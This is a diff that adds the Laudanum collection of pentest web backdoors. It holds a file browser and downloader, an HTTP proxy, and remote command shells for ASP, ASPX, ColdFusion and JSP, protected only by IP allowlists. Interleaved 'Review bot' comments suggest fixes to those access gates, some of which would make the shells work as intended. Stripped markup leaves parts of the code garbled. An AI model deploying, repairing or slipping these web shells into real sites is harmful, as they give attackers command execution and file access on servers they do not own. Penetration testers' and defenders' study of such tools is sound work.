+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' *** This file provides access to the file system.
+' *** Written by Tim Medin
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite Boston, MA USA.
+' *** +' ***************************************************************************** */ + +' ***************** Config entries below *********************** + +' Define variables +Dim allowedIPs +Dim allowed +Dim filepath +Dim file +Dim stream +Dim path +Dim i +Dim fso +Dim folder +Dim list +Dim temppath + +' IPs are enterable as individual addresses TODO: add CIDR support +allowedIPs = "192.168.0.1,127.0.0.1,::1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = split(allowedIPS,",") ' +' make sure the ip is allowed +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + exit for + end if +next +' send a 404 if the IP Address is not allowed +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + +' create file object for use everywhere +set fso = CreateObject("Scripting.FileSystemObject") + +' download a file if selected +filepath = trim(Request.QueryString("file")) +'validate file +if len(filepath) > 0 then + if fso.FileExists(filepath) then + 'valid file + + Set file = fso.GetFile(filepath) + Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name + 'Response.AddHeader "Content-Length", file.Size + Response.ContentType = "application/octet-stream" + set stream = Server.CreateObject("ADODB.Stream") + stream.Open + stream.Type = 1 + Response.Charset = "UTF-8" + stream.LoadFromFile(file.Path) + ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. + Response.BinaryWrite(stream.Read) + stream.Close + set stream = Nothing + set file = Nothing + Response.End + end if +end if + +' begin rendering the page +%> + + + Laudanum ASP File Browser + + + +

Laudanum File Browser 0.1

+ +<% +' get the path to work with, if it isn't set or valid then start with the web root +' goofy if statement is used since vbscript doesn't use short-curcuit logic +path = trim(Request.QueryString("path")) +if len(path) = 0 then + path = fso.GetFolder(Server.MapPath("\")) +elseif not fso.FolderExists(path) then + path = fso.GetFolder(Server.MapPath("\")) +end if + +set folder = fso.GetFolder(path) + +' Special locations, webroot and drives +%>Other Locations: <% +for each i in fso.Drives + if i.IsReady then + %><%=i.DriveLetter%>:  <% + end if +next +%>">web root
<% + +' Information on folder +%>

Listing of: <% +list = split(folder.path, "\") +temppath = "" +for each i in list + temppath = temppath & i & "\" + %><%=i%>\ <% +next +%>

<% + +' build table for listing +%> +<% +' Parent Path if it exists +if not folder.IsRootFolder then + %><% +end if + +' Get the folders +set list = folder.SubFolders +for each i in list + %><% +next + +' Get the files +set list = folder.Files +for each i in list + %><% +next + +' all done +%> +
NameSizeModifiedAccessedCreated
..
<%=i.Name%>\
<%=i.Name%><%=FormatNumber(i.Size, 0)%><%=i.DateLastModified%><%=i.DateLastAccessed%><%=i.DateCreated%>
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp new file mode 100644 index 0000000..d5db078 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp 
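Review bot: The only access gate in file.asp is an exact match of `REMOTE_ADDR` against `allowedIPs`, and the shipped default `"192.168.0.1,127.0.0.1,::1"` includes both loopback addresses. If the site sits behind a reverse proxy or load balancer on the same host, every request would presumably arrive from loopback and pass the check, leaving the file browser open to anyone who can reach the site. I would ship the list empty so an unedited copy denies everyone, e.g. `allowedIPs = "" ' set to the tester's source address for this engagement; avoid loopback entries`. The same default appears in the proxy.asp hunk, and dns.asp (whose hunk begins before the visible part) ships `"192.168.0.1,127.0.0.1"`.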
@@ -0,0 +1,454 @@
+<%@Language="VBScript"%>
+<%Option Explicit%>
+<%Response.Buffer = True%>
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' *** http://laudanum.secureideas.net
+' *** laudanum@secureideas.net
+' ***
+' *** Project Leads:
+' *** Kevin Johnson
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' *** This file provides access as a proxy.
+' *** Written by Tim Medin
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite Boston, MA USA.
+' *** +' ***************************************************************************** */ + +' ***************** Config entries below *********************** + +' Define variables +Dim allowedIPs +Dim allowed +Dim i +Dim s 'generic string, yeah, I know bad, but at this point I just want it to work +Dim urltemp +Dim urlscheme +Dim urlhost +Dim urlport +Dim urlpath +Dim urlfile +Dim urlquery +Dim http +Dim method +Dim contenttype +Dim stream +Dim regex +Dim body +Dim params + +function err_handler() + %> + + + Laudanum ASP Proxy + + +

Fatal Error!

+ <%=Err.Number%>
+ <%=Err.Message%>
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ +<% +end function + +function CleanQueryString +' removes laudurl from the querystring +Dim i +Dim j +Dim s +Dim key +Dim q + + + if len(request.querystring) = 0 then + CleanQueryString = "" + exit function + end if + + ' build the request parameters + for i = 1 to request.querystring.count + key = request.querystring.key(i) + 'response.write "
key:" & key + if key = "laudurl" then + ' if the key is laudurl, we need check if there is a ? in the string since + ' it may have its own query string that doesn't get parsed properly. + s = split(request.querystring("laudurl"), "?") + if ubound(s) > lbound(s) then + ' laudurl contains a ?, it must be manually parsed + key = left(s(1), instr(s(1), "=") - 1) + q = q & "&" & key & "=" & mid(s(1), len(key) + 2) + end if + else + for j = 1 to request.querystring(key).count + 'response.write "
-value:" & request.querystring(key)(j) + q = q & "&" & key & "=" & request.querystring(key)(j) + next + end if + next + + if len(q) > 0 then + CleanQueryString = "?" & mid(q, 2) + else + CleanQueryString = "" + end if +end function + +function CleanFormValues() +Dim r + Set r = New RegExp + r.IgnoreCase = true + r.Global = true + + ' remove the laudurl paramater + r.Pattern = "laudurl=[^&]+($|&)" + CleanFormValues = r.Replace(request.form, "") + Set r = nothing +end function + +sub ParseUrl() +' parses the url into the global variables +Dim urltemp +Dim url + + 'get the url, it may be in the querystring for a get or from a form in a post + url = Request.QueryString("laudurl") + if url = "" then + url = Request.Form("laudurl") + end if + + if url = "" then + urlscheme = "" + urlhost = "" + urlport = "" + urlpath = "" + urlfile = "" + urlquery = "" + exit sub + end if + + ' Parse the url and break it into its components + ' this is done so it can be used to rewrite the page + + ' ensure the url has a scheme, if it doesn't then assume http + if instr(url,"://") = 0 then url = "http://" + url + + ' Get the scheme + urlscheme = split(url, "://")(0) & "://" + + ' urltemp is used to hold the remainder of the url as each portion is parsed + urltemp = mid(url, len(urlscheme) + 1) + 'get the host + if instr(urltemp, "/") = 0 then + ' there is no path so all that is left is the host + urlhost = urltemp + urlport = "" + urlpath = "/" + urlfile = "" + urlport = "" + else + ' there is more that just the hostname remaining + urlhost = left(urltemp, instr(urltemp, "/") - 1) + urltemp = mid(urltemp, len(urlhost) + 1) + + ' is there a port + if instr(urlhost, ":") = 0 then + ' no port + urlport = "" + else + ' there is a port + arr = split(urlhost, ":") + urlhost = arr(0) + urlport = ":" & arr(1) + end if + + ' all that is left is the path and the query + ' is there a query? + if instr(urltemp, "?") = 0 then + ' no query + urlpath = urltemp + 'urlquery = "" + else + 'Response.Write "

" & urltemp & "

" + urlpath = left(urltemp, instr(urltemp, "?") - 1) + 'urlquery = mid(urltemp, instr(urltemp, "?") + 1) + end if + + if right(urlpath, 1) = "/" then + urlfile = "" + else + ' we need to get the path and the file + urltemp = split(urlpath, "/") + urlfile = urltemp(ubound(urltemp)) + urlpath = left(urlpath, len(urlpath) - len(urlfile)) + end if + end if + + urlquery = CleanQueryString + + 'response.write "
scheme: " & urlscheme + 'response.write "
host: " & urlhost + 'response.write "
port: " & urlport + 'response.write "
path: " & urlpath + 'response.write "
file: " & urlfile + 'response.write "
query: " & urlquery + 'response.write "
full: " & FullUrl() + 'response.end +end sub + +function FullUrl() + FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery +end function + +sub RewriteHeaders() +Dim i +Dim header +Dim headervalue +Dim regexdomain +Dim regexpath + + ' setup a regular expression to clean the cookie's domain and path + Set regexdomain = New RegExp + regexdomain.IgnoreCase = true + regexdomain.Global = true + ' rewrite images and links - absolute reference + regexdomain.Pattern = "domain=[\S]+" + + Set regexpath = New RegExp + regexpath.IgnoreCase = true + regexpath.Global = true + ' rewrite images and links - absolute reference + regexpath.Pattern = "path=[\S]+" + + ' go through each header + for each i in Split(http.getAllResponseHeaders, vbLf) + ' Break on the \x0a and remove the \x0d if it exists + i = Replace(i, vbCr, "") + ' make sure it is a header and value + if instr(i, ":") > 0 then + ' break the response headers into header and value + header = trim(Left(i, instr(i, ":") - 1)) + header = replace(header, "_", "-") + headervalue = trim(Right(i, len(i) - instr(i, ":"))) + + ' don't add these two header types since they are handled automatically + if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then + if lcase(header) = "set-cookie" then + ' strip the domain from the cookie + headervalue = regexdomain.replace(headervalue, "") + ' strip the path from the cookie + headervalue = regexpath.replace(headervalue, "") + headervalue = trim(headervalue) + end if + response.AddHeader header, headervalue + end if + end if + next + + Set regexdomain = nothing + Set regexpath = nothing +end sub + +' TODO: Add authentication support so it will work behind a proxy +' IPs are enterable as individual addresses TODO: add CIDR support +allowedIPs = "192.168.0.1,127.0.0.1,::1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = 
split(allowedIPS,",") ' +' make sure the ip is allowed +' TODO: change this to 0 for production, it is 1 for testing +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + exit for + end if +next +' send a 404 if the IP Address is not allowed +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + + +'initialize variables +Set http = nothing +Set regex = nothing +Set stream = nothing + +' Define Constants +const useMSXML2 = 0 +const chunkSize = 1048576 ' 1MB + +' parse the url into its parts +ParseUrl() + +' check if there is a valid url +if len(FullUrl) = 0 then + ' no url to proxy, give `em the boring default page + + ' Default layout of the page + ' First thing you get when you hit the page without giving it a URL + %> + + + Laudanum ASP Proxy + + + + +

Laudanum ASP Proxy

+ +
"> + + +
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + <% + + Response.End() +end if + +' Let's get our Proxy on!!! +' define the request type +if useMSXML2 = 1 then + Set http = Server.CreateObject("MSXML2.XMLHTTP") +else + Set http = Server.CreateObject("Microsoft.XMLHTTP") +end if + +' get the request type +method = Request.ServerVariables("REQUEST_METHOD") + +' setup the request, false means don't send it yet +http.Open method, FullUrl, False + +' send the request +if method = "POST" then + params = CleanFormValues + http.setRequestHeader "Content-type", "application/x-www-form-urlencoded" + http.setRequestHeader "Content-length", len(params) + http.setRequestHeader "Connection", "close" + http.Send(params) +else + http.Send +end if + +' Replace the normal headers with the ones from the response +Response.Clear +contenttype = http.getResponseHeader("Content-Type") +Response.ContentType = contenttype + +' rewrite the headers. Takes headers and passes them to new request +RewriteHeaders() + +' how to respond? is it text or is it something else? 
+if lcase(left(contenttype, 4)) = "text" then + ' response is text, so we need to rewrite it, but that's later + + + ' do the rewriting + body = http.responseText + + Set regex = New RegExp + regex.IgnoreCase = true + regex.Global = true + + ' rewrite images and links - absolute reference + s = urlscheme & urlhost & urlport + regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") + + ' rewrite images and links - full reference + regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") + + ' rewrite images and links - absolute reference + s = urlscheme & urlhost & urlport & urlpath + regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") + + + ' rewrite forms - absolute reference + s = urlscheme & urlhost & urlport + regex.Pattern = "(\]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") + + ' rewrite forms - full reference + regex.Pattern = "(\]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") + + ' rewrite forms - absolute reference + s = urlscheme & urlhost & urlport & urlpath + regex.Pattern = "(\]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") + + Response.Write(body) + + Set regex = nothing +else + ' some sort of binary response, so stream it + Set stream = nothing + Set stream = Server.CreateObject("ADODB.Stream") + stream.Type = 1 'Binary + stream.Open + stream.Write http.responseBody + stream.Position = 0 + + For i = 0 to stream.Size \ chunkSize + Response.BinaryWrite(stream.Read(chunkSize)) + next + Set stream = 
nothing +end if + +Set http = nothing + +Response.End + +:HandleError +err_handler + +%> + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp new file mode 100644 index 0000000..0cdc7c6 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp @@ -0,0 +1,83 @@ +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** Updated and fixed by Robin Wood +' *** Updated and fixed by Tim Medin "1.2.3.4" then + response.Status="404 Page Not Found" + response.Write(response.Status) + response.End +end if + +if Request.Form("submit") <> "" then + Dim wshell, intReturn, strPResult + cmd = Request.Form("cmd") + Response.Write ("Running command: " & cmd & "
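Review bot: The comment above the access gate in proxy.asp, `' TODO: change this to 0 for production, it is 1 for testing`, contradicts the code it sits on, which already reads `allowed = 0`. Anyone who trusts the comment and sets the initial value to 1 disables the allowlist entirely, because the loop only ever raises the flag and never lowers it. I would replace the TODO with `' default-deny: allowed stays 0 unless REMOTE_ADDR matches an allowedIPs entry`. Separately, `ParseUrl` assigns `arr = split(urlhost, ":")` without a `Dim arr` although the file declares `Option Explicit`, so a `Dim arr` belongs at the top of that sub.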
") + set wshell = CreateObject("WScript.Shell") + Set objCmd = wShell.Exec(cmd) + strPResult = objCmd.StdOut.Readall() + + response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" + + set wshell = nothing +end if + +%> + +Laundanum ASP Shell + +
+Command:
+ +

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. +

Example command to do a directory listing:
+%ComSpec% /c dir +

+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx new file mode 100644 index 0000000..f82ed13 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx @@ -0,0 +1,144 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> +Laudanum - DNS + +
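Review bot: In shell.asp the submitted value is written into the page as-is by `Response.Write ("Running command: " & cmd & ...)`, while the command output on the following lines is escaped before it is written. Any markup in the `cmd` field would therefore be rendered in the operator's browser. The echo should be encoded the same way, `Response.Write ("Running command: " & Server.HTMLEncode(cmd) & "<br/>")`. The markup in this part of the page was stripped in extraction, so the exact tag after the command is inferred. Only `StdOut` is read, so anything the process writes to its error stream is silently dropped; a comment saying so would help.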
+QUERY:
+Type: +
+STDOUT:
+
<% = stdout.Replace("<", "<") %>
+
+
+
+STDERR:
+
<% = stderr.Replace("<", "<") %>
+ + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx new file mode 100644 index 0000000..f71fa43 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx @@ -0,0 +1,154 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> +Laudanum - File + + + +<% string[] breadcrumbs = dir.Split('\\'); + string breadcrumb = ""; + foreach (string b in breadcrumbs) + { + if (b.Length > 0) + { + breadcrumb += b + "\\"; + Response.Write("" + Server.HtmlEncode(b) + ""); + Response.Write(" / "); + } + } + %> + + +<% + try + { + if (System.IO.Directory.Exists(dir)) + { + string[] folders = System.IO.Directory.GetDirectories(dir); + foreach (string folder in folders) + { + Response.Write(""); + } + } + else + { + Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); + Response.End(); + } + + } + catch (System.UnauthorizedAccessException ex) + { + Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); + Response.End(); + } + %> + +<% + System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); + System.IO.FileInfo[] files = di.GetFiles(); + foreach (System.IO.FileInfo f in files) + { + Response.Write(""); + } + %> +
NameDateSize
" + Server.HtmlEncode(folder) + "
" + Server.HtmlEncode(f.Name) + "" + f.CreationTime.ToString() + "" + f.Length.ToString() + "
+ + \ No newline at end of file diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx new file mode 100644 index 0000000..cae7665 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx @@ -0,0 +1,129 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> + + + +Laundanum ASPX Shell + + + +cmd /c +
+STDOUT:
+
<% = stdout.Replace("<", "<") %>
+
+
+
+STDERR:
+
<% = stderr.Replace("<", "<") %>
+ + +
+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + \ No newline at end of file diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm new file mode 100644 index 0000000..be0466b --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm @@ -0,0 +1,80 @@ + + + + + + + + +Laudanum Coldfusion Shell + +
+ +Executable: For Windows use: cmd.exe or the full path to cmd.exe
+Arguments: For Windows use: /c command
+ +Executable:
+Arguments:
+
+ +
+ + +
+
+#Replace(foo, "<", "<", "All")#
+
+
+Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. + +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war new file mode 100644 index 0000000000000000000000000000000000000000..5bbf5af6ac55a721ffee4c41dabb3ed161bc6e2d GIT binary patch literal 1203 zcmWIWW@Zs#-~hsRNdZ<2NPv@pg~8V~#8KDN&rSc|DFy~+h5&DN4v-2asImZ@nni#r z;F^6M{XE@VgG2Ou-9G!CIql=Et9OytTUYDcne&^246YbIcv__A<*VcAd$DvC3+IfN zl1HSaG%{GGKhyk?rY8PWJX~!0l4oMt70*;(XMQUBSi}f+$g;XvF?XOfAPjN{7uZpG zXubfsH{8_;>S!ID9|H(d++Y*oz|5SIg`KKnD{a8yt&fjlM7Rf9@&QG&hA;Y*tWj)f*8Zr zS5p^k7rqrOp<2LF+IQmS6Kyu5Zu4UrkHUVu&}+v?2O{GYk%Y^yAyk3CH~emt`!_I|>Tg;zAYpI(e!9i#fNKXubGv)UPK z-WRqBJyuOzc;nH(LzX*J{ zZyo%sRC?%mie2kV18LRf4jW!$rp@n4Bn1C$)l^l#@HYK%ikM*1nq!+wW;$;3>RtCC zcxr|$cSLnv$GZCISLMhS(s{69nOx^D~HOSLaYf9eZmj``W zoWxt%@B6Ks8t}-LP=cxiDRm1zq!+EjQOOeJ@zJ!$;!I z5uY4gRo*nV`x!r5IJczzmem%x(_B+yx}(NSTk4y9xBTUtgDmamIcH7cY+hD3Cms|d zmx2v+Vu7(y4$MCR-i%Bl45&E|maRZJ4;8?(5-1;{YemiopnQh_wm>FaD^e~5nZU(> zJHsGMI0j@QvJb+^pbUhZz(5%Y0p0+aFkR5>gzRWg8bl5YP#Q#lXTT7GrpN$qRyL3X ND-fyzg)5jrJOIrEdoKV0 literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh new file mode 100644 index 0000000..3c89c12 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh @@ -0,0 +1,3 @@ +#!/bin/sh + +jar -cvf cmd.war warfiles/* 
diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF new file mode 100644 index 0000000..1df3391 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF @@ -0,0 +1,3 @@ +Manifest-Version: 1.0 +Created-By: 1.6.0_10 (Sun Microsystems Inc.) + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml new file mode 100644 index 0000000..688e583 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml @@ -0,0 +1,11 @@ + + + +Command +/cmd.jsp + + 
diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp new file mode 100644 index 0000000..e33d3c0 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp @@ -0,0 +1,41 @@ +<%@ page import="java.util.*,java.io.*"%> +<% + +if (request.getRemoteAddr() != "4.4.4.4") { + response.sendError(HttpServletResponse.SC_NOT_FOUND) + return; +} + +%> + +Laudanum JSP Shell + +Commands with JSP +
+ +
+If you use this against a Windows box you may need to prefix your command with cmd.exe /c +
+
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " + request.getParameter("cmd") + "
"); +Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); +OutputStream os = p.getOutputStream(); +InputStream in = p.getInputStream(); +DataInputStream dis = new DataInputStream(in); +String disr = dis.readLine(); +while ( disr != null ) { +out.println(disr); +disr = dis.readLine(); +} +} +%> +
+
+
+Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. +
+ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..321346b56958ca49a4cec87e452fe5f048ea9c64 GIT binary patch literal 82 ucmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}u>uf-_(4F-09OIxU;zLoY6T$x literal 0 HcmV?d00001 diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php new file mode 100644 index 0000000..023927f --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php 
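Review bot: The address gate at the top of cmd.jsp compares strings with `!=`, `if (request.getRemoteAddr() != "4.4.4.4")`, which in Java tests object identity, not content. The condition is therefore true for every caller, including the intended one, so the check does not implement the allowlist it describes. The `response.sendError(HttpServletResponse.SC_NOT_FOUND)` line inside it also lacks its terminating semicolon. I would write `if (!"4.4.4.4".equals(request.getRemoteAddr())) {` and terminate the `sendError` call. The shipped `4.4.4.4` is a publicly routable address; a documentation-range placeholder such as `192.0.2.1` would keep an unedited copy from admitting a real third-party host.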
